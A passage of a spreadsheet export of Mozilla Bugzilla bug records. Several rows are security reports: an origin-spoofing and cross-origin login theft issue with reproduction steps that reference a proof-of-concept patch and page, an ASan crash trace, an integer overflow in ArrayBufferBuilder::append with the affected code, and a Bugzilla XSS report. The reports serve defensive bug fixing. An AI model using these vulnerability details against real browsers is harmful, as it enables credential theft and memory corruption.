3. `webrtcUI.getActiveStreams` (https://searchfox.org/mozilla-central/rev/675d6b7b04c4a802493d29632ee45f6e036a5702/browser/modules/webrtcUI.jsm#180)
This is used in "Tabs sharing devices" menu (the permission prompt is not affected).
4. `LoginAutoComplete::startSearch` (https://searchfox.org/mozilla-central/rev/675d6b7b04c4a802493d29632ee45f6e036a5702/toolkit/components/passwordmgr/LoginAutoComplete.jsm#531) and `LoginManagerChild::_filterForExactFormOriginLogins` (https://searchfox.org/mozilla-central/rev/675d6b7b04c4a802493d29632ee45f6e036a5702/toolkit/components/passwordmgr/LoginManagerChild.jsm#2646)
It seems only fill via the context menu is possible, autofill seems not affected.
Threrefore, the compromised content process can spoof the address bar, extension message from trusted component, Tabs sharing devices" menu, and get logins for another origin.
## REPRODUCTION CASE
1. Apply the attached `poc.patch`.
2. Create a new login for `https://example.com` in `about:logins`.
3. Install the attached extension.
4. Visit the attached `poc.html` over secure origin (an online version is available in https://chs17f87gytb304hg6vk.glitch.me/)
5. Press "Click" and check the address bar.
6. Check the extension message sender.
7. Press "getUserMedia(audio)" and check "Tabs sharing devices" menu.
8. 5-7 should show example.com.
9. Open context menu on the Username field and select the login added in 2. Check the password field is filled.</t>
        </is>
      </c>
      <c r="X4966" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4967">
      <c r="A4967" t="n">
        <v>1222809</v>
      </c>
      <c r="B4967" t="inlineStr">
        <is>
          <t>2015-11-08 07:38:16 -0800</t>
        </is>
      </c>
      <c r="C4967" t="inlineStr">
        <is>
          <t>Memset crash in mozilla::layers::BufferTextureClient::AllocateForSurface</t>
        </is>
      </c>
      <c r="D4967" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:53 -0700</t>
        </is>
      </c>
      <c r="E4967" t="n">
        <v>1</v>
      </c>
      <c r="F4967" t="n">
        <v>1</v>
      </c>
      <c r="G4967" t="n">
        <v>3</v>
      </c>
      <c r="H4967" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4967" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4967" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K4967" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4967" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4967" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4967" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4967" t="inlineStr">
        <is>
          <t>[fixed by bug 1224254][adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q4967" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4967" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4967" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4967" t="n">
        <v>1</v>
      </c>
      <c r="U4967" t="n">
        <v>0</v>
      </c>
      <c r="V4967" t="n">
        <v>14</v>
      </c>
      <c r="W4967" t="inlineStr">
        <is>
          <t>Created attachment 8684660
Testcase
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32[GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[1][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788[GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[1][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[2][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0[GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[1][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[2][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0|[3][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32[GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[1][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[2][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0|[3][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[4][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788[GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[1][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[2][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0|[3][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[4][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[5][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0[GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[6][GFX1-]: BorrowDrawTarget failure, original backend 4|[2][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0|[3][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[4][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[5][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0[GFX1-]: BorrowDrawTarget failure, original backend 4
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[6][GFX1-]: BorrowDrawTarget failure, original backend 4|[7][GFX1-]: Failed 2 buffer db=0x0 dw=0x0 for -3, -3, 17895697, 25|[3][GFX1-]: Attempt to create DrawTarget for invalid surface. Size(17895697,25) Cairo Status: 32|[4][GFX1-]: Failed to create DrawTarget, Type: 4 Size: Size(17895697,25), Data: 0x, Stride: 71582788|[5][GFX1-]: Failed GetAsDrawTarget true, 0x7fd87a0f2000 + 16, Size(17895697,25), 71582788, 0[GFX1-]: Failed 2 buffer db=0x0 dw=0x0 for -3, -3, 17895697, 25
ASAN:SIGSEGV
=================================================================
==11876==ERROR: AddressSanitizer: SEGV on unknown address 0x7fd8179ee000 (pc 0x7fd8fb4ad660 bp 0x7ffd8943c030 sp 0x7ffd8943b7b8 T0)
    #0 0x7fd8fb4ad65f in memset /build/buildd/eglibc-2.19/sysdeps/x86_64/memset.S:90
    #1 0x7fd9000cc855 in mozilla::layers::BufferTextureClient::AllocateForSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:868:5
    #2 0x7fd9000b59af in mozilla::layers::TextureClient::CreateForDrawing(mozilla::layers::CompositableForwarder*, mozilla::gfx::SurfaceFormat, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::BackendSelector, mozilla::layers::TextureFlags, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:479:8
    #3 0x7fd9000b8f07 in CreateTextureClientForDrawing gfx/layers/client/CompositableClient.cpp:214:10
    #4 0x7fd9000b8f07 in mozilla::layers::ContentClientRemoteBuffer::CreateBackBuffer(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/layers/client/ContentClient.cpp:294
    #5 0x7fd9000b94c3 in BuildTextureClients gfx/layers/client/ContentClient.cpp:287:3
    #6 0x7fd9000b94c3 in mozilla::layers::ContentClientRemoteBuffer::CreateBuffer(gfxContentType, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int, RefPtr&lt;mozilla::gfx::DrawTarget&gt;*, RefPtr&lt;mozilla::gfx::DrawTarget&gt;*) gfx/layers/client/ContentClient.cpp:323
    #7 0x7fd8fffd7a18 in mozilla::layers::RotatedContentBuffer::BeginPaint(mozilla::layers::PaintedLayer*, unsigned int) gfx/layers/RotatedBuffer.cpp:670:5
    #8 0x7fd9000e5c81 in mozilla::layers::ContentClientRemoteBuffer::BeginPaintBuffer(mozilla::layers::PaintedLayer*, unsigned int) objdir-ff-asan/dist/include/mozilla/layers/ContentClient.h:218:12
    #9 0x7fd9000aa454 in mozilla::layers::ClientPaintedLayer::PaintThebes() gfx/layers/client/ClientPaintedLayer.cpp:65:5
    #10 0x7fd9000ab3bf in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) gfx/layers/client/ClientPaintedLayer.cpp:141:3
    #11 0x7fd9000ed9e4 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:7
    #12 0x7fd9000ed9e4 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:7
    #13 0x7fd9000a509d in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:281:3
    #14 0x7fd9000a567b in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:324:3
    #15 0x7fd904945246 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1701:3
    #16 0x7fd9049f784c in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:3441:5
    #17 0x7fd904a7b77b in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6132:5
    #18 0x7fd9040763c5 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:466:7
    #19 0x7fd90407539e in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:397:9
    #20 0x7fd904782211 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1733:5
    #21 0x7fd90478b62a in TickDriver layout/base/nsRefreshDriver.cpp:196:5
    #22 0x7fd90478b62a in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:187
    #23 0x7fd90478d174 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:343:9
    #24 0x7fd9050cf0e4 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) layout/ipc/VsyncChild.cpp:63:5
    #25 0x7fd8ff11c260 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PVsyncChild.cpp:220:20
    #26 0x7fd8fec73ebf in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PBackgroundChild.cpp:1555:16
    #27 0x7fd8febe2e9b in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) ipc/glue/MessageChannel.cpp:1385:14
    #28 0x7fd8febe038c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&amp;) ipc/glue/MessageChannel.cpp:1305:17
    #29 0x7fd8febd2907 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() ipc/glue/MessageChannel.cpp:1276:5
    #30 0x7fd8feb55a6d in RunTask ipc/chromium/src/base/message_loop.cc:364:3
    #31 0x7fd8feb55a6d in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask const&amp;) ipc/chromium/src/base/message_loop.cc:372
    #32 0x7fd8feb5673a in MessageLoop::DoWork() ipc/chromium/src/base/message_loop.cc:459:13
    #33 0x7fd8febea852 in mozilla::ipc::DoWorkRunnable::Run() ipc/glue/MessagePump.cpp:220:3
    #34 0x7fd8fe1f2145 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:964:7
    #35 0x7fd8fe27593c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:297:10
    #36 0x7fd8febe9e6f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:127:5
    #37 0x7fd8feb546d1 in RunInternal ipc/chromium/src/base/message_loop.cc:234:3
    #38 0x7fd8feb546d1 in RunHandler ipc/chromium/src/base/message_loop.cc:227
    #39 0x7fd8feb546d1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:201
    #40 0x7fd9040d8acf in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:3
    #41 0x7fd906090383 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:787:12
    #42 0x7fd8feb546d1 in RunInternal ipc/chromium/src/base/message_loop.cc:234:3
    #43 0x7fd8feb546d1 in RunHandler ipc/chromium/src/base/message_loop.cc:227
    #44 0x7fd8feb546d1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:201
    #45 0x7fd90608f8a7 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:623:7
    #46 0x4dbd14 in content_process_main(int, char**) ipc/contentproc/plugin-container.cpp:237:19
    #47 0x7fd8fb442ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287</t>
        </is>
      </c>
      <c r="X4967" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4968">
      <c r="A4968" t="n">
        <v>54437</v>
      </c>
      <c r="B4968" t="inlineStr">
        <is>
          <t>2000-09-27 15:54:44 -0700</t>
        </is>
      </c>
      <c r="C4968" t="inlineStr">
        <is>
          <t>realplayer does not load as embedded plugin in some cases (MIME problems?)</t>
        </is>
      </c>
      <c r="D4968" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4968" t="n">
        <v>1</v>
      </c>
      <c r="F4968" t="n">
        <v>1</v>
      </c>
      <c r="G4968" t="n">
        <v>6</v>
      </c>
      <c r="H4968" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4968" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4968" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4968" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4968" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4968" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4968" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4968" t="inlineStr">
        <is>
          <t>[rtm-]</t>
        </is>
      </c>
      <c r="Q4968" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4968" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4968" t="inlineStr">
        <is>
          <t>mozilla0.8</t>
        </is>
      </c>
      <c r="T4968" t="n">
        <v>1</v>
      </c>
      <c r="U4968" t="n">
        <v>0</v>
      </c>
      <c r="V4968" t="n">
        <v>33</v>
      </c>
      <c r="W4968" t="inlineStr">
        <is>
          <t>build:2000092711 branch
plugin: realplayer G2
Steps:
1 Go to the url above
2 Click on any of the links under the title "Video Headlines"
3 Observe a javascript window open up with the puzzle icon in place of   
  realplayer  
4 Clicking on it to get the plugin does not do anything but clicking on the link 
  saying "Click here if your version of RealPlayer doesn't work with these media 
  files." works fine and launches realplayer as a helper app.
5 This works fine in 4.x browser.</t>
        </is>
      </c>
      <c r="X4968" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4969">
      <c r="A4969" t="n">
        <v>425665</v>
      </c>
      <c r="B4969" t="inlineStr">
        <is>
          <t>2008-03-28 06:06:43 -0700</t>
        </is>
      </c>
      <c r="C4969" t="inlineStr">
        <is>
          <t>[SECURITY] XSS in show_bug.cgi: id isn't filtered for format=multiple</t>
        </is>
      </c>
      <c r="D4969" t="inlineStr">
        <is>
          <t>2008-05-05 14:47:58 -0700</t>
        </is>
      </c>
      <c r="E4969" t="n">
        <v>1</v>
      </c>
      <c r="F4969" t="n">
        <v>1</v>
      </c>
      <c r="G4969" t="n">
        <v>4</v>
      </c>
      <c r="H4969" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4969" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4969" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4969" t="inlineStr">
        <is>
          <t>2.17.2</t>
        </is>
      </c>
      <c r="L4969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4969" t="inlineStr"/>
      <c r="Q4969" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4969" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4969" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4969" t="n">
        <v>1</v>
      </c>
      <c r="U4969" t="n">
        <v>0</v>
      </c>
      <c r="V4969" t="n">
        <v>36</v>
      </c>
      <c r="W4969" t="inlineStr">
        <is>
          <t>id isn't filtered for format=multiple.
Noted by lbutler on IRC, via some automated XSS checker thing (lbutler - can you add details?).
lpsolit verfied on 2.20 :(
will look into it and do patch in a sec</t>
        </is>
      </c>
      <c r="X4969" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4970">
      <c r="A4970" t="n">
        <v>1168207</v>
      </c>
      <c r="B4970" t="inlineStr">
        <is>
          <t>2015-05-25 13:36:13 -0700</t>
        </is>
      </c>
      <c r="C4970" t="inlineStr">
        <is>
          <t>Memory safety problem in ArrayBufferBuilder::append</t>
        </is>
      </c>
      <c r="D4970" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:34 -0700</t>
        </is>
      </c>
      <c r="E4970" t="n">
        <v>1</v>
      </c>
      <c r="F4970" t="n">
        <v>1</v>
      </c>
      <c r="G4970" t="n">
        <v>3</v>
      </c>
      <c r="H4970" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4970" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4970" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4970" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L4970" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4970" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4970" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q4970" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4970" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4970" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4970" t="n">
        <v>1</v>
      </c>
      <c r="U4970" t="n">
        <v>0</v>
      </c>
      <c r="V4970" t="n">
        <v>19</v>
      </c>
      <c r="W4970" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:***) Gecko/20100101 Firefox/**.*
Build ID: 20150305021524
Steps to reproduce:
ArrayBufferBuilder::append (in dom\base\nsXMLHttpRequest.cpp) can overwrite memory it does not own if aDataLen is very large. For example, assume that mLength=2, aDataLen=0xffffffff, and mCapacity=2. In this case, the LHS on line 4019 overflows, giving the value 1. Control then skips to line 4047 (assume a release build), which copies aDataLen bytes from aNewData all over Firefox's address space. Presumably this eventually will cause an access-violation crash on 32-bit platforms, but perhaps not before some other thread uses the written data to do something undesirable. On 64-bit platforms, execution might continue for a long time, depending upon how address space is laid out.
I don't know, however, whether ArrayBufferBuilder::append is exposed to external content in such a way that this defect can be exploited. I suppose that a server could send back a defective XMLHttpRequest containing a very large length, though perhaps other code checks for this problem.
4013: bool
4014: ArrayBufferBuilder::append(const uint8_t *aNewData, uint32_t aDataLen,
4015:                            uint32_t aMaxGrowth)
4016: {
4017:   MOZ_ASSERT(!mMapPtr);
4018: 
4019:  if (mLength + aDataLen &gt; mCapacity) {
4020:     uint32_t newcap;
4021:     // Double while under aMaxGrowth or if not specified.
4022:     if (!aMaxGrowth || mCapacity &lt; aMaxGrowth) {
4023:       newcap = mCapacity * 2;
4024:     } else {
4025:       newcap = mCapacity + aMaxGrowth;
4026:     }
4027: 
4028:     // But make sure there's always enough to satisfy our request.
4029:     if (newcap &lt; mLength + aDataLen) {
4030:       newcap = mLength + aDataLen;
4031:     }
4032: 
4033:     // Did we overflow?
4034:     if (newcap &lt; mCapacity) {
4035:       return false;
4036:     }
4037: 
4038:     if (!setCapacity(newcap)) {
4039:       return false;
4040:     }
4041:   }
4042: 
4043:   // Assert that the region isn't overlapping so we can memcpy.
4044:   MOZ_ASSERT(!areOverlappingRegions(aNewData, aDataLen, mDataPtr + mLength,
4045:                                     aDataLen));
4046: 
4047:   memcpy(mDataPtr + mLength, aNewData, aDataLen);
4048:   mLength += aDataLen;
4049: 
4050:   return true;
4051: }</t>
        </is>
      </c>
      <c r="X4970" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4971">
      <c r="A4971" t="n">
        <v>97976</v>
      </c>
      <c r="B4971" t="inlineStr">
        <is>
          <t>2001-09-01 23:21:34 -0700</t>
        </is>
      </c>
      <c r="C4971" t="inlineStr">
        <is>
          <t>Tests to do ...</t>
        </is>
      </c>
      <c r="D4971" t="inlineStr">
        <is>
          <t>2015-02-27 04:44:51 -0800</t>
        </is>
      </c>
      <c r="E4971" t="n">
        <v>1</v>
      </c>
      <c r="F4971" t="n">
        <v>1</v>
      </c>
      <c r="G4971" t="n">
        <v>4</v>
      </c>
      <c r="H4971" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4971" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4971" t="inlineStr">
        <is>
          <t>Testing Suite</t>
        </is>
      </c>
      <c r="K4971" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4971" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4971" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4971" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4971" t="inlineStr"/>
      <c r="Q4971" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4971" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4971" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4971" t="n">
        <v>1</v>
      </c>
      <c r="U4971" t="n">
        <v>0</v>
      </c>
      <c r="V4971" t="n">
        <v>24</v>
      </c>
      <c r="W4971" t="inlineStr">
        <is>
          <t>We should check for the following at least:
1.  Single parameter exec/system calls.
2.  Jake's regexp problem.
3.  Characters in filenames that are illegal on some platforms.
4.  \$::M?FORM\s*[^{]</t>
        </is>
      </c>
      <c r="X4971" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4972">
      <c r="A4972" t="n">
        <v>1203255</v>
      </c>
      <c r="B4972" t="inlineStr">
        <is>
          <t>2015-09-09 12:20:46 -0700</t>
        </is>
      </c>
      <c r="C4972" t="inlineStr">
        <is>
          <t>Keep Add exclusion buttons inside the Sheriff panel at all sizes</t>
        </is>
      </c>
      <c r="D4972" t="inlineStr">
        <is>
          <t>2015-09-24 13:40:53 -0700</t>
        </is>
      </c>
      <c r="E4972" t="n">
        <v>1</v>
      </c>
      <c r="F4972" t="n">
        <v>1</v>
      </c>
      <c r="G4972" t="n">
        <v>7</v>
      </c>
      <c r="H4972" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4972" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4972" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4972" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4972" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4972" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4972" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4972" t="inlineStr"/>
      <c r="Q4972" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4972" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4972" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4972" t="n">
        <v>1</v>
      </c>
      <c r="U4972" t="n">
        <v>0</v>
      </c>
      <c r="V4972" t="n">
        <v>5</v>
      </c>
      <c r="W4972" t="inlineStr">
        <is>
          <t>At narrower browser widths the blue Add exclusion and Add profile buttons get a bit clipped at the bottom of the Sheriff panel.
For now let's leave them down there and fix that. Perhaps if we have demand for it we might move them to the top of the panel, adjacent to the Tabs.</t>
        </is>
      </c>
      <c r="X4972" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4973">
      <c r="A4973" t="n">
        <v>896474</v>
      </c>
      <c r="B4973" t="inlineStr">
        <is>
          <t>2013-07-22 07:30:37 -0700</t>
        </is>
      </c>
      <c r="C4973" t="inlineStr">
        <is>
          <t>Port /about/forums pages from SVN to bedrock and/or other locations</t>
        </is>
      </c>
      <c r="D4973" t="inlineStr">
        <is>
          <t>2015-07-29 07:39:12 -0700</t>
        </is>
      </c>
      <c r="E4973" t="n">
        <v>1</v>
      </c>
      <c r="F4973" t="n">
        <v>1</v>
      </c>
      <c r="G4973" t="n">
        <v>5</v>
      </c>
      <c r="H4973" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4973" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4973" t="inlineStr">
        <is>
          <t>Bedrock</t>
        </is>
      </c>
      <c r="K4973" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4973" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4973" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4973" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4973" t="inlineStr">
        <is>
